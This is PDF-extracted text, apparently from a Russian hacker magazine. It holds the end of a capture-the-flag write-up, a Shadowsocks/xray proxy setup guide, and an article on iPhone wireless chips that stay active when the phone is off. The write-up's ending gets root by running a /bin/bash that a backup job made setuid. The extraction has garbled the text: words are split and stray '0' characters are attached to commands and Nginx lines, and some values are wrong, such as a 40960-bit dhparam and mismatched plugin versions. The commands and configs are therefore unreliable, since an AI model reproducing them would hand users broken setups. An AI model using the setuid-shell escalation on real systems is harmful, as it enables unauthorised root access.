Когда­ у файла­ установ­ лен­ атрибут­ setuid (S-атрибут­ ), обычный­ пользователь­ , запускающий­ этот файл, получает­ повышение­ прав до пользовате­ ля­ — вла ­ дельца­ файла­ в рамках­ запущенного­ процес­ са­ . После­ получения­ повышенных­ прав приложе­ ние­ может выполнять­ задачи, которые недоступны­ обычному­ пользовате­ лю­ . Из за возможнос­ ти­ состояния­ гонки­ многие­ операци­ онные­ системы­ игнориру­ ют­ S-атрибут­ , установ­ ленный­ shell-скриптам­ .

Где то спустя­ три минуты (период­ бэкапа понятен благода­ ря­ именам­ файлов­ ) проверя­ ем­ разрешения­ /bin/bash.

Разрешения­ файла­ /bin/bash

S-бит выставлен­ , поэтому­ запускаем­ новую оболоч­ ку­ в контек­ сте­ root.

Флаг рута

Флаг рута у нас в руках, и машина захвачена­ !

СТРОИМ ЗАЩИЩЕННЫЙ КАНАЛ С ВНЕШНИМ МИРОМ

Nik Zerof xtahi0nix@gmail.com

В нашем полном­ опасностей­ , чрезвычай­ ­но жестоком­ мире нужно­ уметь защищать свою жизнь, имущес­ ­тво, трафик­ и драгоцен­ ­ные фоточки­ с котиками­ . В этой статье я расска­ ­ жу, как настро­ ­ить защищенный­ канал связи­ с внешним­

миром, который будет сложно­ отличить­ от обычного­ HTTPSтрафика­ и, следова­ ­тель­но, заблокиро­ ­вать или расшифро­ ­ вать. Колдунс­ ­тво­вать мы будем с помощью прокси­ Shadowsocks с плагином­ xray. Все ПО находится­ в актуаль­ ­ ном состоянии­ и постоян­ ­но обновляется­ .

Информа­

ция­

предос­ тавле­

на­

исключитель­

но­

для ознакоми­

тель­

ных­

и академи­

чес­ ких­

целей.

Автор просит­

соблюдать­

законодатель­

ство­

той

страны­ , на территории­

которой ты находишься­ !

Кто может интересо­ ­вать­ся твоими­ сетевыми­ соединени­ ­ями? Да кто угодно­ ! От хакерских­ группировок­ до злобных­ админов­ , которые любят шейпить­ раз ­ ные типы трафика­ (например­ , наши любимые торренты­ ). Да и просто­ иногда­ требует­ ­ся сменить­ IP (например­ , чтобы­ посмотреть­ зарубежную­ новинку­ в онлайн кинотеатре­ ).

Итак, перед настрой­ ­кой софта­ нам придет­ ­ся заняться­ необходимы­ ­ми под готовитель­ ­ными работами­ :

•купить­ VPS;

•купить­ доменное­ имя;

•зарегис­ ­три­ровать­ся на Cloudfare и выполнить­ необходимую­ настрой­ ­ку.

Разберем­ по порядку­ .

VPS

Чтобы­ свести­ риски­ к минимуму­ , необходимо­ выбирать хостера­ VPS дос ­ таточно­ дотошно­ — обращай­ внимание­ на то, в каком государстве­ зарегис ­ трирова­ но­ юридичес­ кое­ лицо, в каких странах­ физически­ расположе­ ны­ сер ­ веры. Предпочте­ ние­ следует­ отдавать­ тем, где законодатель­ ство­ строго­ относит­ ся­ к личной­ информации­ (например­ , Швейцария­ или Исландия). Это касается­ как места­ регистра­ ции­ юридичес­ кого­ лица, так и физического­ нахождения­ серверов­ .

Кроме­ того, не следует­ забывать про «альянс­ 14 глаз» (Австра­ ­лия, Бель ­ гия, Великобритания­ , Германия­ , Дания, Испания­ , Италия­ , Канада, Нидер ­ ланды, Новая Зеландия­ , Норвегия­ , США, Франция­ , Швеция­ ) — это страны­ , которые свобод­ ­но обменива­ ­ются разведдан­ ­ными друг с другом­ (законо ­ дательство­ у них соответс­ ­тву­ющее). Если твои данные­ попали в руки одной страны­ из этого­ списка­ , можно­ считать­ , что остальные­ тоже их получили­ .

Кроме­ того, есть страны­ , которые так или иначе­ сотрудни­ чают­ с альянсом­ : Южная Корея, Япония­ , Израиль­ , Сингапур­ . Это на уровне­ слухов­ , но, как известно­ , дыма без огня не бывает­ . Можно­ много­ говорить о том, что кон ­ кретно­ ты им не нужен, что у них и без тебя забот полно­ , — тут каждый­ решает­ для себя, что ему важнее­ . Например­ , автор эти страны­ сразу­ вычеркнул­

из списка­ кандидатов­ . Итак, VPS купили, идем дальше­ .

ДОМЕННОЕ ИМЯ

Здесь нет никаких особых­ требова­ ­ний, хочу только­ отметить­ , что часто­ хос ­ тинги VPS заодно­ торгуют­ и доменными­ именами­ . На мой взгляд, более секь ­ юрно использовать­ возможнос­ ­ти того же хостинга­ VPS, чем обращать­ ­ся в другую­ компанию­ и там по второму­ кругу­ светить­ свои данные­ . В этой статье мы будем использовать­ некий абстрак­ ­тный домен secret-site.com. Идем дальше­ .

Почему­ не следует­ использовать­ ESNI/ECH? Все очень просто­ : если некоторые­ сетевые фильтры­ не могут определить­ сайт назначения­ , то они просто­ блокиру­ ют­ соединение­ .

CLOUDFLARE

Cloudfare в нашей цепочке­ играет­ роль защитного­ механизма­ : мы скрываем­ настоящий­ IP нашего VPS и защищаем­ его от некоторых­ видов атак. Трафик­ от нашего компа­ будет идти сначала­ в сеть Cloudfare и только­ из нее —

к нашему VPS. Кроме­ того, Cloudfare сгенери­ рует­ сертификат­ для TLS-соеди ­ нения, и весь трафик­ на всем пути следова­ ния­ будет завернут­ в TLS 1.3.

Для начала нам нужно­ пройти­ регистра­ ­цию и привязать­ к сервису­ куп ­ ленный домен. Далее на вкладке­ DNS нужно­ заполнить­ строки­ А (две штуки­ ), в которые мы вводим­ наш домен (в одну строку­ с приставкой­ www, в другую­ без нее) и IP нашего VPS.

Запол­ нение­ записей А

После­ этого­ необходимо­ ввести­ показанные­ нам серверы­ имен Cloudfare в панель управления­ нашего доменного­ регистра­ тора­ на вкладке­ DNS.

Серверы­ имен Cloudfare

Далее­ на вкладке­ SSL/TLS:

•выбира­ ем­ шифрование­ Full (strict);

•включаем­ Always Use HTTPS;

•включаем­ TLS 1.3;

•устанав­ лива­ ем­ Minimum TLS Version на 1.3;

•включаем­ Opportunistic Encryption;

•включаем­ Automatic HTTPS Rewrites.

Включаем­ шифрование­ соединения­ на полную­ !

Уф ф, немного­ укрепили­ TLS, можно­ двигать­ ­ся дальше­ . Теперь идем в Client Certifcates на той же вкладке­ и жмем кнопку­ Create Certifcate для генерации­ сертифика­ ­та и ключа­ (условим­ ­ся, что файлы­ будут называться­ secret-site.

pem и secret-site.key).

Теперь­ идем на VPS и приступа­ ем­ к настрой­ ке­ .

НАСТРОЙКА VPS

Итак, в некоторой­ степени­ утомитель­ ная­ подготови­ тель­ ная­ процеду­ ра­ окон ­ чена, давай теперь настра­ ивать­ сам VPS. Все настрой­ ки­ будут делаться­ на Debian 11 x64.

Сначала­ обновим­ пакеты и установим­ вспомога­ ­тель­ные утилиты­ :

apt update && apt upgrade -y

apt install -y dnsutils nethogs vnstat sendmail fail2ban nano wget

unzip htop psmisc nginx0

Теперь­ разберем­ ­ся с сертифика­ ­тами и ключами­ от Cloudfare — их мы положим на наш VPS в папку­ /etc/ssl/ и выдадим ей права­ только­ на чтение­ .

Далее­ надо сгенери­ ­ровать параметр Диффи­ — Хеллма­ ­на:

openssl dhparam -out /etc/ssl/dh-param.pem 40960

Положим­ его в ту же папку­ /etc/ssl/.

Теперь­ приступим­ к настрой­ ­кам Nginx в файле­ /etc/nginx/nginx.conf — в его стандар­ ­тную структуру­ достаточ­ ­но добавить наш сертификат­ , ключ, DH и некоторые­ служеб­ ­ные настрой­ ­ки:

server{0

listen 443 ssl http2 reuseport backlog=131072 fastopen=256;0

ssl_certificate /etc/ssl/secret-site.pem;0

ssl_certificate_key /etc/ssl/secret-site.key;0

ssl_dhparam /etc/ssl/dh-param.pem

ssl_protocols TLSv1.3;0

ssl_ecdh_curve secp384r1;0

add_header X-Robots-Tag "noindex, nofollow" always;0

add_header X-Content-Type-Options "nosniff" always;0

add_header X-Xss-Protection "1; mode=block" always;0

add_header Strict-Transport-Security 'max-age=63072000;

includeSubdomains; preload' always;0

resolver localhost valid=300s;0

ssl_buffer_size 8k;0

ssl_prefer_server_ciphers off;0

Далее­ добавим локации:

location / {0

limit_req zone=one burst=5 nodelay;0

index index.html index.htm;0

limit_rate 19k;0

set $limit_rate 19K;0

proxy_redirect off;0

}0

location /secretline {

proxy_redirect off;0

proxy_buffering off;0

proxy_http_version 1.1;0

proxy_pass http://localhost:8008/;0

proxy_set_header Host $http_host;0

proxy_set_header Upgrade $http_upgrade;0

proxy_set_header Early-Data $ssl_early_data;0

proxy_set_header Connection "upgrade";0

}0

В location / я вписал­ index.html — это просто­ сайт заглушка­ , который будет болтать­ ­ся на нашем серваке­ для того, чтобы­ противос­ ­тоять активному­ зондирова­ ­нию. Проще­ говоря, если какой то зонд будет сканиро­ ­вать сервер­

в поисках­ Shadowsocks или чего то еще, он просто­ увидит­ нашу заглушку­ . Тогда­ он подумает­ , что это обычный­ сайт, оставит­ нас в покое и уйдет пить пиво.

Локация­ location /secretline — это и есть наш Shadowsocks. Вместо­ строки­ secretline нужно­ придумать­ что то более оригиналь­ ное­ и труд ­ ноподбира­ емое­ , эта строка­ будет передавать­ ся­ в качестве­ параметра­ на кли ­ енте к плагину­ xray.

Далее­ скачива­ ­ем и устанав­ ­лива­ем Shadowsocks и xray-plugin:

wget https://github.com/shadowsocks/shadowsocks-rust/releases/

download/v1.14.3/shadowsocks-v1.14.3.x86_64 unknown-linux-gnu.tar.xz

&&

tar -xf shadowsocks-v1.14.3.x86_64-unknown-linux-gnu.tar.xz0

wget https://github.com/teddysun/xray-plugin/releases/download/v1.5.

4/xray-plugin-linux-amd64-v1.5.5.tar.gz &&

tar -xf xray-plugin-linux-amd64-v1.5.5.tar.gz0

Создаем­ папку­ shadowsocks и копируем­ в нее нужные­ файлы­ :

mv ssserver /bin0

mv xray-plugin /etc/shadowsocks/xray-plugin0

Настра­ иваем­ разрешения­ :

setcap 'cap_net_bind_service=+eip' /etc/shadowsocks/xray-plugin0

setcap 'cap_net_bind_service=+eip' /bin/ssserver0

Теперь­ создадим­ файл конфигура­ ции­ сервера­ Shadowsocks:

touch /etc/shadowsocks/shadowsocks-rust.json0

nano /etc/shadowsocks/shadowsocks-rust.json0

И запишем туда такой текст:

{

"server":["127.0.0.1"],

"server_port":8008,

"password":"Password123",

"timeout":300,

"method":"chacha20-ietf-poly1305",

"fast_open":true,

"reuse_port":true,

"plugin":"/etc/shadowsocks/xray-plugin",

"plugin_opts":"server;loglevel=none",

"nameserver":"1.1.1.1",

"mode": "tcp_and_udp",

"no_delay": true,

"workers":1

}

Давай­ пройдем­ ся­ по основным пунктам­ :

•"server_port" — порт, на котором будет висеть сервер­ shadowsocks;

•"workers" — количество­ ядер на сервере­ ;

•"ipv6_first" — поддер­ ­жка протоко­ ­ла IPv6;

•"nameserver" — IP DNS-сервера­ , если есть локальный­ , то 127.0.0.1;

•"plugin" и "plugin_opts" используют­ ­ся для плагина­ xray;

•"reuse_port" — оптимиза­ ­ция для более быстро­ ­го использования­ сети;

•"method" — используемое­ шифрование­ ;

•"password" — пароль для подклю­ ­чения к серверу­ .

Теперь­ создадим­ сервис­ ss-xray.service:

nano /etc/systemd/system/ss-xray.service0

Записы­ ваем­ туда следующий­ текст:

[Unit]

Description=Shadowsocks with XRAY

After=network.target

[Service]

Type=simple

User=nobody

Group=nogroup

LimitNOFILE=51200

ExecStart=/bin/ssserver -c /etc/shadowsocks/shadowsocks-rust.json

ExecStop=/bin/killall ssserver

Restart=always

RestartSec=10

[Install]

WantedBy=multi-user.target

Сохраня­ емся­ и выходим: Ctrl + O, Ctrl + X. Включаем­ сервис­ :

sysctl -p && systemctl enable ss-xray.service0

С основной настрой­ ­кой мы закончили­ , теперь можно­ немного­ оптимизи­ ­ ровать сетевой стек. В файл /etc/sysctl.conf дописываем­ следующее­ :

fs.file-max = 131072

net.core.rmem_max = 8388608

net.core.wmem_max = 8388608

net.core.rmem_default = 8388608

net.core.wmem_default = 8388608

net.core.optmem_max = 8388608

net.core.netdev_max_backlog = 131072

net.core.somaxconn = 131072

net.ipv4.ip_local_port_range = 1024 65535

net.ipv4.tcp_mem = 25600 51200 102400

net.ipv4.tcp_rmem = 4096 1048576 4194304

net.ipv4.tcp_wmem = 4096 1048576 4194304

net.ipv4.tcp_fastopen=3

net.ipv4.tcp_low_latency = 1

net.ipv4.tcp_no_metrics_save = 1

net.ipv4.tcp_adv_win_scale = 1

net.ipv4.tcp_tw_reuse = 1

net.ipv4.tcp_timestamps = 0

net.ipv4.tcp_fin_timeout = 30

net.ipv4.tcp_window_scaling = 1

net.ipv4.tcp_keepalive_time = 150

net.ipv4.tcp_keepalive_probes = 5

net.ipv4.tcp_keepalive_intvl = 30

net.ipv4.tcp_synack_retries = 1

net.ipv4.tcp_slow_start_after_idle=0

net.ipv4.tcp_max_syn_backlog = 65536

net.ipv4.tcp_max_tw_buckets = 720000

net.ipv4.tcp_mtu_probing = 1

Опять сохраня­ ­емся и перезагружа­ ­ем сервер­ . Теперь все должно­ работать. Что в итоге­ у нас получилось­ ? Запрос­ от нашего компа­ уходит­ в CDN

Cloudfare, а возвра­ ­щает­ся от нашего VPS. Для внешнего­ наблюдате­ ­ля соз ­ дается­ впечат­ ­ление, будто­ комп общается­ по TLS с каким то сайтом­ , но что передает­ — узнать не получится­ , ибо шифрование­ . Другими­ словами­ , наб ­ людается­ обычная­ сетевая активность, чего мы и хотели добиться­ .

В качестве­ клиентов­ к серваку­ можно­ смело­ юзать:

•SagerNet для Android;

•Shadowsocks-windows для винды­ ;

•ShadowsocksX-NG для macOS.

Как еще можно­ укрепить­ наш VPS? Например­ , так:

•сменить­ порт SSH для того, чтобы­ автомати­ ­чес­кие сканеры­ не ломились на стандар­ ­тный порт;

•настро­ ­ить Fail2ban, чтобы­ ограничить­ количество­ попыток ввести­ неп ­ равильный­ пароль для входа­ на сервер­ ;

•вместо­ прямого­ обращения­ к DNS-серверу­ можно­ настро­ ­ить локальный­ сервер­ , который связыва­ ­ется с внешним­ миром при помощи DoH или DoT, чтобы­ даже хостер­ VPS не знал, какие DNS-запросы­ ты шлешь;

•настро­ ­ить учет трафика­ , чтобы­ не получить внезап­ ­ный счет от хостера­ (если трафик­ у него лимитирован­ ).

Одним­ словом­ , включай­ фантазию­ и обустра­ ивай­ свой неприступ­ ный­ VPS!

КАК ВЫКЛЮЧЕННЫЙ IPHONE МОЖЕТ ШПИОНИТЬ ЗА СВОИМ ВЛАДЕЛЬЦЕМ

Специалис­

ты­ из герман­ ской­

лаборатории­

Secure Mobile Networking Lab опуб ­

ликовали­

большое­

исследова­

ние­

с громким­

заголовком­ ,

гласящим­

, что

в iPhone могут завестись­

вредоно­

сы­ , которые остаются­

активными­ даже пос ­

ле выключения­

питания девайса­ . Однако­ если вдумчиво­

прочитать­

все один ­

надцать

страниц­

доклада­

, выяснится­

, что такие вредоно­

сы­ существу­ ют­

исключитель­

но­ в воспален­

ном­

воображении­

этих самых герман­ ских­

иссле ­

дователей­

. На самом деле речь идет о том, что в мобильных­

устройствах­

под управлением­

iOS имеется­

несколь­

ко­ чипов, продол­ жающих­

работать,

даже когда­ питание телефона­ отсутству­ ет­ . Так, при выключении­

iPhone поль ­

зователь все равно­ можно­ найти­ его с помощью функции­

Find My Phone. Если

батарея разрядит­

ся­ , то iPhone выключит­

ся­ автомати­

чес­ ки­ и перейдет­ в энер ­

госберега­

ющий­

режим, но в таком случае­

все равно­ сохраня­

ется­

доступ­

к кредит­ ным­

картам­ и другим­ объектам­

из приложе­

ния­ Wallet. Эти возможнос­

­

ти могут превратить­

выключен­

ный­

телефон в устройство­

для слежки­ за поль ­

зователем­ .

Беспро­ вод­ ные­

чипы в iPhone могут работать в так называемом­

режиме

низкого­

энергопот­

ребле­

ния­

(Low Power Mode, LPM). Обрати­ внимание­

: LPM

не тождес­ ­тве­нен энергосбе­ ­рега­юще­му режиму, который обознача­ ­ется икон ­ кой «желтая­ батарея». В режиме LPM устройство­ не реагирует­ на нажатия или встряхива­ ­ние. Этот режим активиру­ ­ется либо когда­ пользователь­ вык лючает­ телефон, либо когда­ iOS завершает­ работу автомати­ ­чес­ки из за низ ­ кого заряда батареи. Если нажать кнопку­ включения­ в эконом­ ­ном режиме с низким­ энергопот­ ­ребле­нием, то экран активиру­ ­ется всего­ на несколь­ ­ко секунд. Устройство­ сообщит­ о низком­ заряде аккумуля­ ­тора и выведет список­ активных в данный­ момент возможнос­ ­тей LPM, как показано­ на следующем­ рисунке­ .

Find My и Express Cards в энергосбе­ рега­ ющем­ режиме

Сеть Find My Phone остается­ доступна­ после­ выключения­ устройства­ . Если ты потеряешь­ iPhone, когда­ он разряжен­ , как раз с помощью этой сети его и можно­ найти­ — она работает­ на основе­ Bluetooth. Режим Express Mode под ­ держивает­ выбранные­ проездные­ билеты, а также­ кредит­ ­ные карты­ и циф ­ ровые ключи­ из «Кошелька­ » — так устройство­ удается­ задейство­ ­вать быс ­ трее, дополнитель­ ­ная аутентифика­ ­ция со стороны­ пользовате­ ­ля не требует­ ­ ся. При отключении­ из за низкого­ заряда батареи эти карты­ и ключи­ остаются­ доступны­ для использования­ на протяже­ ­нии пяти часов. Исходно для под ­ держания­ устройства­ во включен­ ­ном виде со всеми­ этими­ возможнос­ ­тями требова­ ­лась только­ NFC. Теперь же появился­ новый протокол­ DCK 3.0, использующий­ режимы Bluetooth и UWB, а также­ поддержи­ ­вающий режим Express Mode. Этот протокол­ использует­ ­ся в конструк­ ­ции электрон­ ­ных авто ­ мобильных­ ключей­ , а режим Express Mode предох­ ­раня­ет от неприят­ ­ностей из разряда­ «захлопнул­ ключи­ в машине или в квартире­ ». Еще он оставляет­ в распоряже­ ­нии пользовате­ ­ля его карты­ , чтобы­ можно­ было выполнять­ пла ­ тежи, даже если телефон сел.

КАК ЭТО РАБОТАЕТ?

Поддер­ жка­ LPM реализова­ на­ на аппарат­ ном­ уровне­ . Модуль управления­ питанием­ PMU может включать­ чипы поодиноч­ ке­ . Чипы для Bluetooth и UWB жестко­ подклю­ чены­ к защищенному­ элемен­ ту­ (SE) чипа NFC и хранят­ сек ­ реты, которые должны­ быть доступны­ в режиме LPM. Посколь­ ку­ LPM под ­ держивает­ ся­ на аппарат­ ном­ уровне­ , эту поддер­ жку­ нельзя­ убрать, меняя програм­ мные­ компонен­ ты­ . Именно­ поэтому­ владелец­ современ­ ного­ айфона­

уже не может быть уверен­ ным­ , что чипы для беспро­ вод­ ной­

связи­ отключат­ ся­

после­ выключения­

устройства­

.

LPM значитель­

но­

коварнее­ ,

чем имитация­

выключения­

девайса­ ,

при которой просто­ деактивиру­

ется­

экран. Вспомина­

ется­

случай­ , когда­

Агентство националь­

ной­

безопасности­

США имитиро­

вало­

выключение­

экра ­

на на умном телевизоре­

в целях шпиона­ жа­ . На айфоне­ при этом будет

заметен быстрый­

расход­ батареи, и такая «подсадка­

» в мобильное­

устрой ­

ство не останет­ ся­ незамечен­ ной­ .

Возможнос­

ти­ Bluetooth и UWB в режиме LPM не документирова­

ны­

и до

недавнего­

времени­

не исследова­

лись­

. Но в руководстве­ по безопасности­

для платформы­

Apple подробно­

описана­

относяща­

яся­

к NFC LPM воз ­

можность под названи­

ем­ Express Card, появившаяся­

в iOS 12. В своей­ работе

герман­

ские­

исследова­

тели­

использовали­

инстру­ мен­ ты­ для анализа­

и изме ­

нения прошив­ ки­

в

современ­

ных­

айфонах­ , доступные­

для

скачива­

ния­

в репозитори­

ях­ InternalBlue и Frankenstein. С помощью этих программ­

они

выяснили­

, что в энергосбе­

рега­

ющем­

режиме айфоны­ не столь безопасны­ ,

как это кажется­ со стороны­

.

iOS

реализует­

безопасные­

беспро­ вод­ ные­

платежи­

на NFC-чипе с при ­

менением­

технологии­

Secure Element (SE). Эта технология­

работает­ на плат ­

форме JavaCard, которая выполняет­

апплеты­ , например­

Apple Pay или DCK.

В ходе начальной­

установ­ ки­ апплеты­ персонали­

зиру­

ются­

.

Персонали­

зация­

позволя­

ет­ дополнитель­

но­ разгра­ ничи­

вать­

зоны безопасности­

. Например­

,

в платеж­ ном­

апплете­ не хранит­ ся­ никакой информации­

о кредит­ ных­

картах­ ,

кроме­

отзывного­

идентифика­

тора­

, известно­ го­ платеж­ ной­

сети. Апплеты­

,

в том числе­ их секреты­

, отделены­

друг от друга­ . Они хранят­ ся­ в SE и не

покидают­ ее. В процес­ се­ платежа­

или при беспро­ вод­ ных­

транзакци­

ях­ среда­

SE в составе­

чипа NFC откликает­

ся­

напрямую­

, не переадре­

суя­ эти данные­

в iOS. Следова­

тель­

но­ , даже если iOS или приложе­

ния­

скомпро­ мети­

рова­

ны­ ,

кредит­ ные­

карты­ и другие­ ключи­ невозможно­

украсть из SE.

Исполь­ зование­ безопасной­ среды­ (SE) и процес­ сора­ Secure Enclave Processor (SEP) в соответс­ твии­ с документаци­ ей­ Apple

Среда­ SE подклю­ ­чена к процес­ ­сору Secure Enclave Processor (SEP). Процес­ ­

сор SEP авторизу­ ­ет платежи­ , обеспечивая­ аутентифика­ ­цию пользовате­ ­ля через Touch ID, Face ID или c помощью пин кода. Обрати­ внимание­ : SEP не хранит­ данные­ в SE, а использует­ отдельный­ безопасный­ компонент­ хра ­ нилище­ . SE и SEP объеди­ ­няют­ся в пару, следова­ ­тель­но, коммуника­ ­ция между­ ними может шифровать­ ­ся и аутентифици­ ­ровать­ся.

ЭКСПРЕСС-КАРТЫ И FIND MY

Приложе­

ние­

Wallet («Кошелек») позволя­

ет­ конфигури­

ровать­

работающие­

по NFC кредит­ ные­ , дискон­ тные­

карты­ и проездные­

билеты, а также­ ключи­

для режима Express Mode. Экспресс­

карта­ больше­ не требует­

авториза­

ции­

по SEP, обеспечивая­

таким образом­

быстрые­

и удобные­

платежи­

без разбло­ ­

кировки­ iPhone. В экспресс­

режиме, чтобы­ пройти­ авториза­

цию­ , достаточ­

но­

лишь владеть­

самим телефоном­ . Если авториза­

цию­

пропус­ тить­ , ни SEP,

ни iOS не потребу­

ются­

для завершения­

транзакции­

по NFC, а сама ком ­

муникация­ сможет­ работать автоном­ но­ , при помощи апплетов­ SE.

Как только­ у iPhone закончится­

заряд, при условии­ , что у пользовате­

ля­

есть экспресс­

карта­ , iPhone выключит­

ся­ , но чип NFC останет­ ся­ запитан

на протяже­

нии­

пяти часов. В этот период­ экспресс­

карты­ будут работать,

но при

выключении­

устройства­

по инициати­

ве­ пользовате­

ля­ NFС также­

отключает­

ся­ .

В iOS 15 появились­

две новые возможнос­

ти­ , доступные­

в режиме низкого­

энергопот­

ребле­

ния­ : Find My Phone, собствен­

ная­

сеть Apple на основе­

Bluetooth с низким­

энергопот­

ребле­

нием­

(BLE), работающая­

офлайн и пред ­

назначен­ ная­ для поиска­ потерянных­ устройств­ , и поддер­ жка­ цифрового­

авто ­

мобильного­

ключа­ (Digital Car Key, DCK 3.0), при которой UWB применя­

ется­

для безопасного­

измерения­

рассто­ яния­

. Следова­

тель­

но­ , и Bluetooth, и чип

UWB могут работать автоном­ но­ , пока iOS отключена­

. Эти возможнос­

ти­

не документирова­

ны­ и ранее не исследова­

лись­

.

Find My — это офлайновая­

сеть для нахождения­

устройств­ , которую авто ­

ры доклада­

детально­ исследова­

ли­ , включая­

реверс соответс­

тву­ юще­

го­ ПО.

Она находит iPhone, AirTag и другие­ устройства­

Apple, даже когда­ они не под ­

ключены­

к интернету­ . Если девайс не в сети, в режиме пропажи­

он регулярно­

шлет широковеща­

тель­

ные­

BLE-оповеще­

ния­ . Подклю­ чен­ ные­

к сети устрой ­

ства, расположен­

ные­

поблизос­

ти­ , ловят такие оповеще­

ния­

и

сообщают­

законному­

владель­

цу­ , где находится­ его «потеряшка­ ».

Протокол­

Find My защищен сквозным­

шифровани­

ем­ , анонимен­

и работает­

с сохранени­

ем­ конфиден­

циаль­

нос­ ти­ . Эти гарантии­ безопасности­

основаны­

на девайс специфич­

ном­

«маячковом­

» мастер­ ключе­ , который синхро­ низи­

­

руется­ с цепочкой­ ключей­ из пользователь­

ско­ го­ iCloud. Поэтому­ доступ­ сох ­

раняется­

до тех пор, пока пользователь­

в состоянии­

залогинить­

ся­ в iCloud.

Цепоч­ ка­ ключей­ также­ хранит­ ся­ локально­ , а для доступа­

к ее секретно­

му­

ключу­ требует­

ся­ пройти­ полный­

путь через SEP. На мастер­ ключе­ маячка­

генерирует­

ся­

оборачи­

вающаяся­

последова­

тель­

ность­

пар,

в

каждую­

из которых входит­ открытый­ и закрытый­

ключ. Эта последова­

тель­

ность­

зафик ­

сирована­ навечно­ , и каждый­

ключ действи­

телен­

только­ в свой промежу­

ток­

времени­

. Чтобы­ связать­

открытые­

ключи­ в этой последова­

тель­

нос­ ти­ друг

с другом­ , требует­

ся­ знать маячковый­

мастер­ ключ. Устройство­

широковеща­

­

тельно­ сообщает­

актуаль­ ный­

публичный­

ключ в виде BLE-объявле­

ния­ , а часть

этого­ ключа­ также­ устанав­ лива­

ет­ MAC-адрес случай­ ным­

образом­ . Любое

устройство­

, подклю­ чен­ ное­ к интернету­ и наблюда­

ющее­

BLE-объявле­

ние­ сети

Find My, может зашифровать­

свое нынешнее­

пример­

ное­

местонахож­

дение­

открытым­

ключом­

и

сообщить­

его Apple. Только­ у законного­

владель­

ца­

потерянного­

устройства­

, которое пока находится­ офлайн, имеется­

под ­

ходящий

закрытый­

ключ, чтобы­ расшифро­

вать­

отчет о местополо­

жении­

.

По отчету­ о местополо­

жении­

невозможно­

идентифици­

ровать­

сообщивше­

го­ .

Цепочка­ открытых­ ключей­ на iPhone полностью­

проматы­

вает­

ся­ за 15 мин, что

ограничи­

вает­

возможность­

отследить­

смартфон­

по его BLE-объявле­

ниям­

.

Метки­ AirTag функци­ ональ­

но­ подобны­ сети Find My. Потеряв соединение­

по Bluetooth с iPhone владель­

ца­ , они начинают­ рассылать­

широковеща­

тель­

­

ные сообщения­

, которые принима­

ются­

другими­

подклю­ чен­ ными­

к

сети

устройства­

ми­ .

Работа­

сети

Find

My

поддержи­

вает­

ся­

после­

отключения­

питания,

и информация­

об этом выводится­ в диалоговом­

окне завершения­

работы.

Пользователь­

может изменить­

эту настрой­

ку­ всякий­

раз, когда­ выключа­

ет­

устройство­

вручную­ . Если на iPhone полностью­

израсходует­

ся­ батарея и он

перейдет­ на резервный­

источник питания, сеть Find My активиру­

ется­

авто ­

матичес­ ки­ , подобно­ экспресс­

картам­

на NFC-чипе. Для поддер­ жки­

режима

LPM требует­

ся­ прошив­ ка­ Bluetooth, которая может рассылать­

BLE-сооб ­

щения, когда­ iOS отключит­ ся­ .

Диало­ говое­ окно завершения­ для сети Find My на iOS 15

Чипы­ Broadcom Bluetooth могут конфигури­ ­ровать­ся либо для взаимо­ ­дей­ствия с хостом­ , например­ iOS, либо для работы в качестве­ автоном­ ­ных приложе­ ­ ний, например­ на IoT-устройствах­ . При переходе­ в режим LPM работа стека­ iOS Bluetooth завершает­ ­ся и настрой­ ­ки чипа Bluetooth сбрасыва­ ­ются. Затем множес­ ­тво команд интерфейса­ хост контрол­ ­лера конфигури­ ­руют параметры­ сети Find My. Последняя­ команда­ отключает­ HCI, тем самым останав­ ­ливая всякую­ коммуника­ ­цию с iOS. Прошив­ ­ка запускает­ автоном­ ­ный поток широко ­ вещатель­ ­ных сообщений­ Find My. Модулю управления­ питанием­ (PMU) рекомендует­ ­ся держать­ чип Bluetooth включен­ ­ным, несмотря­ на отключение­

iOS.

Коман­ ­ды конфигура­ ­ции HCI для сети Find My позволя­ ­ют задавать множес­ ­ твенные­ открытые­ ключи­ в расчете­ на краткий­ и долгий­ интервал ротации. Длитель­ ­ность интервала­ и общее количество­ ключей­ — переменные­ параметры­ . В iOS 15.3 устанав­ ­лива­ется 96 ключей­ на короткий­ интервал (15 мин) и 0 ключей­ на долгий­ интервал (24 ч). Следова­ ­тель­но, автоном­ ­ное приложе­ ­ние, работающее­ по Bluetooth, может отправлять­ широковеща­ ­тель ­ ные сообщения­ Find My в течение не более 24 ч.

«АВТОМОБИЛЬНЫЕ» КЛЮЧИ DCK 3.0

Наряду­ с NFC-картами­ iOS также­ поддержи­ ­вает «автомобиль­ ­ные» ключи­ (Digital Car Key, DCK 3.0). Их используют­ службы­ каршерин­ ­га, а также­ при ­ ложения­ , позволя­ ­ющие управлять с телефона­ современ­ ­ными «цифровыми­ » автомоби­ ­лями — дистанци­ ­онно запускать­ двигатель­ , включать­ режим охраны­ , открывать­ со смартфо­ ­на двери­ и багажник­ , задейство­ ­вать иммобилай­ ­зер. Еще DCK позволя­ ­ет устанав­ ­ливать скорос­ ­тной лимит для молодых водителей­ , а также­ совмес­ ­тно использовать­ такой ключ через iCloud.

Несмотря­ на удобство­ DCK с точки­ зрения­ пользовате­ ля­ , эта технология­ привносит­ новые векторы­ атак. Со стороны­ реализации­ основные риски­ несут автопроизво­ дите­ ли­ . Скомпро­ мети­ рован­ ный­ DCK или изъяны­ в его реализации­ могут быть использованы­ для угона­ машины, но не для кражи­ iPhone. Угон реальной­ машины — это не цифровой­ платеж­ , его не отменишь­ . Такие риски­ и побудили­ автопроизво­ дите­ лей­ перейти­ с DCK 2.0 (основан­ ных­ на NFC) на DCK 3.0.

Аббре­ ­виату­ра NFC (коммуника­ ­ция ближнего­ поля) подска­ ­зыва­ет, что успешные транзакции­ могут проходить­ только­ между­ двумя­ устройства­ ­ми, находящими­ ­ся рядом, NFC и другие­ сравнитель­ ­но старые­ технологии­

